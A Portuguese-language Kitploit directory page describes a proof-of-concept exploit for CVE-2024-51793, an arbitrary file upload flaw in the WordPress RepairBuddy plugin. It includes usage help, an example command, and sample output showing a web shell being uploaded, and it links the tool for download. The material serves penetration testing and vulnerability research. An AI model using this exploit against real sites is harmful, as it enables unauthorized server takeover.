Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-51793 — Plugin WordPress RepairBuddy <= 3.8115 - Vulnerabilidade de upload arbitrário de arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-51793
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubnxploited/cve-2024-51793

CVE-2024-51793

Plugin WordPress RepairBuddy <= 3.8115 - Vulnerabilidade de upload arbitrário de arquivos

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ Exploit do Plugin WordPress RepairBuddy

📜 Informações da CVE

ID da CVE: CVE-2024-51793
Publicado: 2024-11-11
Atualizado: 2024-11-11
Título: Plugin WordPress RepairBuddy <= 3.8115 - Vulnerabilidade de Upload Arbitrário de Arquivo
Descrição:
Vulnerabilidade de Upload Irrestrito de Arquivo com Tipo Perigoso em Webful Creations Computer Repair Shop permite enviar um Web Shell para um Servidor Web. Este problema afeta o Computer Repair Shop: de n/a até 3.8115.

CWE:

  • CWE-434: Upload Irrestrito de Arquivo com Tipo Perigoso

CVSS:

  • Pontuação: 10.0 (CRÍTICO)
  • Versão: 3.1
  • String do Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

📋 Descrição

Este é um exploit de prova de conceito para a vulnerabilidade de Upload Arbitrário de Arquivo no plugin WordPress RepairBuddy versões <= 3.8115. O exploit permite que um atacante envie um web shell para o servidor vulnerável.

⚙️ Requisitos

  • Python 3.x
  • biblioteca requests ()
pip install requests

🚀 Uso

root@kitploit:~
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload

📖 Exemplo

root@kitploit:~
python 
CVE-2024-51793.py -u http://target.com/wordpress

📝 Saída

root@kitploit:~
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php

👨‍💻 Autor

Explorado por: Nxploited, Khaled Alenazi

Baixar ferramenta